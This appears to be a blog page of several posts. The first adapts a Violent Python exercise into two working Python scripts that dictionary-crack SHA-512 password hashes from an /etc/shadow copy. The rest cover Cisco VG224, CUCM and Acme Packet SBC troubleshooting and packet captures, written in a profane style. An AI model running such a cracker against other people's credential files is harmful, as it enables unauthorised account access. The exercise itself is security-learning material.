
Violent Python

I’m going through a book called Violent Python, and the first program is building a password cracker. The example is great, but it uses the crypt module and DES, which is a bit out of date. The author suggests adapting the program for SHA-512, which is used on many modern *nix systems.

So, I came up with this rudimentary program to crack SHA-512 hashed passwords (5,000 rounds) from my /etc/shadow file. There are, of course, MUCH better ways to crack passwords, but hopefully this will be helpful to someone else going through this book.

#!/usr/bin/python
# -*- coding: utf-8 -*-
from passlib.hash import sha512_crypt


def testPass(cryptPass, saltySalt):
    # Hash each dictionary word with the salt pulled from the shadow entry
    # and compare it to the stored hash.
    with open('dictionary.txt', 'r') as dictFile:
        for word in dictFile:
            word = word.strip('\n')
            cryptWord = sha512_crypt.using(salt=saltySalt, rounds=5000).hash(word)
            if cryptWord == cryptPass:
                print '[+] Found Password: ' + word + '\n'
                return
    print '[-] Password Not Found.\n'


def main():
    # Each shadow entry looks like user:$6$salt$hash:...
    with open('shadow.txt') as passFile:
        for line in passFile:
            if '$' in line:
                user = line.split(':')[0]
                cryptPass = line.split(':')[1]
                saltySalt = line.split('$')[2]
                print '[*] Cracking Password For: ' + user
                testPass(cryptPass, saltySalt)


if __name__ == '__main__':
    main()
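
If you’d rather not fish the salt out of the shadow entry yourself, passlib will happily parse the full $6$salt$hash string for you. Here’s a minimal sketch of the same dictionary loop using sha512_crypt.verify(), which pulls the salt and rounds out of the stored hash automatically (same dictionary.txt and shadow.txt files as above):

#!/usr/bin/python
# -*- coding: utf-8 -*-
# Alternative sketch: let passlib parse the salt/rounds out of the stored hash.
from passlib.hash import sha512_crypt


def crack(cryptPass):
    with open('dictionary.txt', 'r') as dictFile:
        for word in dictFile:
            word = word.strip('\n')
            # verify() re-hashes word with the salt/rounds embedded in cryptPass
            if sha512_crypt.verify(word, cryptPass):
                print '[+] Found Password: ' + word + '\n'
                return
    print '[-] Password Not Found.\n'


with open('shadow.txt') as passFile:
    for line in passFile:
        if '$6$' in line:
            user = line.split(':')[0]
            cryptPass = line.split(':')[1]
            print '[*] Cracking Password For: ' + user
            crack(cryptPass)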

Ok, so now that we’ve got this bad boy installed, a new password set, and licensing taken care of, it’s time to start configuring!

The first thing we need to do is to define an IP address for management access, so from within the vSphere console window we do:

>enable

#configure terminal

(configure)#bootparam

Then, it will go a little like this:

[Screenshot: the interactive bootparam prompts where the management IP address and related boot parameters are entered]

Now, we need to save and activate this before we get all web-browser giddy and ditch the CLI for all those happy GUI times ahead.

So, let’s do that:

(configure)#exit

#save-config

#activate-config

Sweet! Now we can get all visual and stuff. Browse to your IP address and log in with ‘admin’ and your newly created enable password. Click around a bit – enjoy it. Then RTFM, and join us in the next post, where we start really configuring shit.


Did you think I was done busting caps after that last post? Really? You must not have known that I’m an O.G.

Sometimes it’s not enough to be busting caps on the IP-encapsulated stuff. Sometimes you need to pull a PCM trace from the router or VG224.

Cisco makes it easy for you if you’re using an ISR G2 router or a VG350, but if you have to do it on a VG224, it’s not so straightforward. The commands to get the pcm.dat file are really no big deal. Capturing on port 2/0 looks like this:

conf t
voice hpi capture destination flash:pcm.dat
voice hpi capture buffer 5000000
exit

test voice port 2/0 pcm-dump caplog 7

test voice port 2/0 pcm-dump disable

dir
Directory of slot0:/

1  -rw-    21237908  Feb 28 2002 19:06:04 -05:00  vg224-i6s-mz.124-22.T5.bin
2  -rw-    28900564  Feb 28 2002 19:22:52 -05:00  vg224-i6k9s-mz.151-4.M6.bin
3  -rw-     4954752   Aug 2 1993 12:31:10 -05:00  pcm.dat

64012288 bytes total (8912896 bytes free)
copy pcm.dat tftp
Address or name of remote host []? 10.98.1.198
Destination filename [pcm.dat]?
!!!!!!!!!!!!!!!!!!!!!
4954752 bytes copied in 43.960 secs (112710 bytes/sec)


The tricky part is that you need to decode this file before you can listen to it, and it’s a Cisco-only “Packet Capture Extraction Tool” that TAC uses to do it. Fuckers.

If anybody out there reading this can help an O.G. figure out how to do this on his own – please hit me up with a comment!

Sometimes I bust so many caps I feel like I’m Waka Flocka.

Today I had to bust a cap on an Acme Packet 3820. A strange, intermittent one-way audio problem had been plaguing us for some time. All the SIP traces had looked good on the call examples, and we were unable to reproduce the issue. So, time went on, and once in a while we would hear about another one. Always from the same guy, and always a wireless caller calling in from the PSTN to him.

This is one of the most frustrating things in IT: intermittent problems with no real pattern that you cannot reproduce. Well, we had our breakthrough a couple of days ago. We had a few more people reporting problems, and found a pattern to it. It was happening only to the people who had Mobility (Single Number Reach) enabled on their phones. We were able to reproduce it with the client, so I set up a test phone to mirror their configuration, and sure enough, I could reproduce it on my test phone, too. Jackpot!

So, I started to look at the traces. It was quite the call flow between 4 pairs of SBCs, a CUCM SME cluster, a Siemens OSV, and a CUCM Leaf cluster. SIP messaging was bouncing around like hollow points ricocheting.

We were able to simplify it a little bit – get it down to 2 SBC pairs, take the OSV out of the call flow, and modify the route group so at least we could choose the SBC pair for the outbound call to the remote destination.

After doing this, and making several test calls, it was still very hit or miss. One in four or so would fail, with no real pattern to it. All the signaling looked good when scrutinizing the SDP. So what next?

I did what any good little UC engineer would do and started busting caps. First, I put the 6945 I was using for testing onto a switch I had hanging out with me and did a little monitor-session config:

First – filter those nasty BPDUs on your uplink port so you don’t put the port on the switch in the closet into an errdisable state:

interface FastEthernet0/48
switchport mode access
power inline never
spanning-tree bpdufilter enable

Then, pick your nose, and the ports that you want to use:

no monitor session 1
monitor session 1 source interface FastEthernet 0/1 both
monitor session 1 destination interface Fa0/2

Now, it was time to shark my wire, and what did I see? RTP in both directions:

[Screenshot: Wireshark capture showing RTP streams flowing in both directions]

Digging into the details – those little UDP packets were headed for the right port on the SBC, so it was time to capture on the other side.

Here’s what I did to send a copy of all the packets in/out of the SBC to my laptop:

3820_HOSTNAME# configure terminal
3820_HOSTNAME(configure)# system
3820_HOSTNAME(system)# capture-receiver
3820_HOSTNAME(capture-receiver)# state enabled
3820_HOSTNAME(capture-receiver)# address 10.98.1.198
3820_HOSTNAME(capture-receiver)# network-interface s1p0:0
3820_HOSTNAME(capture-receiver)# exit
Save Changes [y/n]?: y
capture-receiver
state enabled
address 10.98.1.198
network-interface s1p0:0
last-modified-by admin@10.98.1.198
last-modified-date 2015-04-25 18:57:06

3820_HOSTNAME(system)# exit
3820_HOSTNAME(configure)# exit
3820_HOSTNAME# save-config
checking configuration
Save-Config received, processing.
waiting for request to finish
Request to ‘SAVE-CONFIG’ has Finished,
Save complete
Currently active and saved configurations do not match!
To sync & activate, run ‘activate-config’ or ‘reboot activate’.
3820_HOSTNAME# activate-config
Activate-Config received, processing.
waiting for request to finish
Request to ‘ACTIVATE-CONFIG’ has Finished,
Activate Complete
3820_HOSTNAME# packet-trace remote start s1p0 10.98.61.45

Trace started for 10.98.61.45
3820_HOSTNAME# packet-trace remote start s0p0 192.168.205.12

Trace started for 192.168.205.12
3820_HOSTNAME#
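
On the laptop side (the 10.98.1.198 address configured above), you just need something capturing what the SBC forwards to you. I used Wireshark, but if you’d rather script it, here’s a rough Python sketch using scapy that grabs everything hitting the capture interface for five minutes and writes it to a pcap – the interface name and the time window are assumptions, and you’d tighten the BPF filter once you see what the SBC is actually sending:

#!/usr/bin/python
# Rough sketch: record whatever the SBC's capture-receiver forwards to this laptop.
# 'en0' and the 300-second window are assumptions - adjust for your machine.
# Needs to run with enough privileges to sniff the interface.
from scapy.all import sniff, wrpcap

packets = sniff(iface='en0', timeout=300)
wrpcap('sbc_trace.pcap', packets)
print '[*] Wrote ' + str(len(packets)) + ' packets to sbc_trace.pcap'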


So I was recently tasked with building out a UAT (user acceptance testing) environment for a customer. This is basically an exact replica of the production environment we have just spent 2 years designing and implementing. It allows the customer to test any upgrades, changes, or patches before actually implementing them in production. Plus, it’s pretty cool if you are doing some dicey shit and wanna make sure you don’t bring the entire enterprise to its knees in the middle of the day.

Now to the problem. 30% or so of the UAT environment was already built out using an SU 1 version of Call Manager. Now you may say, “Who fucking cares?” Well, guess what – I do. Cisco doesn’t publish a bootable version of the SU 1 release, and when you are adding new subscribers to an existing publisher, the versions of Call Manager have to be exactly the same, or the new subscribers will shit all over themselves. So we came up with the brilliant idea to switch versions on all the UAT servers that were currently up and running (I have a bootable ISO for that older version). Once I got all the existing servers back to the old version, I could install all the new servers, do a switch-version at the CLI of the existing servers, and then do a simple upgrade on all the new servers to the SU 1 version of Call Manager. Sounds easy, right? Well, it is pretty fucking easy – the only problem is it doesn’t fucking work. I got the entire environment built out, ran the switch-version commands, then set off the upgrades. Came back an hour later to find all 20 or so of my new servers had failed the upgrade process.

So, back to square one. I deleted all those new servers and started noodling on this shit some more. Now, I am sure we have all seen this screen when building out a new environment.

[Screenshot: the CUCM install wizard screen asking whether to apply a patch during installation]

If you are like me, you typically just tab right through this shit. But hey, this sounds like my scenario, right? I have existing servers running an SU 1 version, I am installing new subscribers, and I am lacking the bootable ISO. So why not install the bootable version, press yes on this screen, and apply the upgrade at the end? Again, this sounds easy, right? Fuckin’ eh, it’s easy. Now here is the issue: I am building 25 servers, and there is no fucking way I am doing this without answer files. I could not for the life of me find a way to apply this upgrade patch and use answer files at the same time. So I said fuck it, I will build one by hand without the answer files and just see if it works. Guess what – that shit still failed. I was all out of ideas here. Did I mention I only had 4 days to build out and fully test this giant UAT environment? I had just spent 1.5 of those 4 days fucking around with this stupid shit.

Now, if you scroll down a few blog posts to the one at http://www.backdoorburglar.com/?p=144, you will see that we had a major issue with deleting a few production servers (no big deal, right?)… haha, this was actually a huge fucking deal, but that’s an entirely different matter. The reason I am bringing this up is because during that huge debacle, we actually got Cisco TAC to confirm that you should not apply an upgrade patch during the install (then why the fuck is that even on the install page?). This also prompted them to give us the bootable ISO of the SU 1 version of Call Manager that I was sorely in need of. So I went back and deleted all the new servers I had built (AGAIN) and rebuilt them using that bootable ISO. Now you may be thinking to yourself, “What a lazy fucker – why didn’t he troubleshoot the failed upgrades instead of being a big vagina and taking the easy way out with the bootable ISO?” To that I say, “Fuck you.” I was trying to cram 10 lbs of shit into a 5 lb bag by trying to build out this ginormous environment in 4 days, and I had already spent 1.5 days getting absolutely nowhere. Sometimes you gotta know when to hold ’em and know when to fold ’em.

Busting a Cap

Debugging is part of life as an engineer. If I had a dollar for every time I double- and triple-checked my configuration, then got to the point where it was time to run debugs, I would be a rich motherfucker.

Debugging on IOS is pretty damn good. I applaud Cisco for how well they build these sorts of features into their products, not to mention how well documented they are. But, as Mick Jagger once said, “You can’t always get what you want”.

That’s what happened today when I started looking into a problem getting T.38 to work with the following call flow: Verizon SIP trunk –> Acme Packet 3820 –> CUCM SME –> CUCM Leaf –> MGCP-connected VG224

We see the re-INVITE for T.38 version 0 sent to Verizon, and they send us a 200 OK with SDP indicating T.38 version 0 as well. The call stays up for 32 seconds, and then we hang up and send Verizon a BYE.

All the debugs looked good, so it was time to start capturing packets. In this environment, it’s pretty difficult to get a network engineer to do a port span – so we chose to capture packets on the VG224.

Here’s the config we used to do this:

conf t
logging monitor
exit
term mon
debug vpm signal

monitor capture buffer holdpackets
monitor capture point ip cef t38trace FastEthernet 0/0 both
monitor capture point associate t38trace holdpackets
monitor capture point start t38trace

monitor capture point stop t38trace
monitor capture buffer holdpackets export tftp://10.98.1.198/t38capture.pcap
no monitor capture point ip cef t38trace FastEthernet 0/0 both
no monitor capture buffer holdpackets


If you want to read more about capturing packets in IOS – check out this Link.
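
Once the buffer is exported, you can open t38capture.pcap in Wireshark – or, if you want a quick sanity check first, here’s a rough Python sketch with scapy that just counts UDP packets per destination port, so you can see whether the T.38/UDPTL stream negotiated in the SDP ever actually shows up (the filename matches the export above; mapping ports to RTP vs. T.38 is up to you, from the SDP):

#!/usr/bin/python
# Quick-and-dirty sanity check of the exported capture: count UDP packets
# per destination port and compare against the RTP / T.38 ports in the SDP.
from collections import Counter
from scapy.all import rdpcap, UDP

packets = rdpcap('t38capture.pcap')
ports = Counter(pkt[UDP].dport for pkt in packets if UDP in pkt)
for port, count in ports.most_common():
    print '[*] ' + str(count) + ' packets to UDP port ' + str(port)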


Clusterfuck

Have you ever fucked up so bad that it’s pitchfork in the ass bad?


Everybody has those day-to-day fuckups. Stuff you learn from and say, “Oh, silly me – I should pay closer attention. How did I ever leave my keys in the refrigerator?”

Shit like that is kinda funny, and you think about it next time you come home and decide to hang them on the hook that is dedicated to this function – instead of chilling them like a hooker or a penguin (which are ironically the only two things that never really get cold – google it).

Then there are the big ones – and they’re usually stupid mistakes with no real excuse. The kind of stuff that happens when you get in a hurry, and have a momentary lapse of reason on something really, really important. These are the ones that cause the defecation to hit the rotary oscillator in a triumphant manner.

One of my favorite features of modern web browsers is tabs. I always organize my tabs from left to right. Mine go like this: SME, Leaf1, Leaf2, CUC, SBC1, SBC2…

It’s a good strategy when working in a complex environment with lots of clusters. Your mileage may vary – but this scheme works for me.

Yesterday afternoon I was on fire. We were blowing out a couple of clusters and rebuilding them. We had answer files, OVAs, some fresh 420 (UCS C420s, hippie – what were you thinking?). When you add these together, you can fire off 10 different windows at once and just watch all those babies come to life. Stop for a minute to migrate 8 sites to a new set of SBCs, then – oops – well, it looks like we added a few servers under System -> Server that won’t actually be added to the cluster for a few more days. I remembered someone once telling me that you shouldn’t leave servers configured in there if they’re not online, because you can end up with database corruption down the road that way.

So, I quickly deleted them. Fuck it – it’s a non-production cluster, right? Well, the CUCM tabs on the right are… OH SHIT! This is the tab on the LEFT!!!!

To be continued…

I don’t know about you, but I always appreciate a good tool. In fact, I’ve had many ex-girlfriends call me a total tool, and I always took that as a really great compliment! I mean, the use of tools is what separates us from the apes, right? (well, that and chromosome #2)

One guy who is a very evolved Homo sapiens with a well-functioning prefrontal cortex is Mr. Burns.

[Image: Mr. Burns from The Simpsons]

Ok, ok, no – not THAT Mr. Burns. I’m talking about the IT superhero who runs BBBBlog. I had the pleasure of working with him a few years ago, when I was very new to Cisco UC. He’s one of those brilliant engineers who inspires you to learn more just to try to catch up to him, even though you probably never will. Now I stalk him on the interweb from time to time to learn new tricks.

One new trick I learned today is a splendid tool for doing core maps / UC VM placement. I thought I was doing a great job of this with a borrowed Excel spreadsheet that was nicely formatted for the purpose. Now I know that is the punk-ass-bitch way of doing it. Check out this TOOL.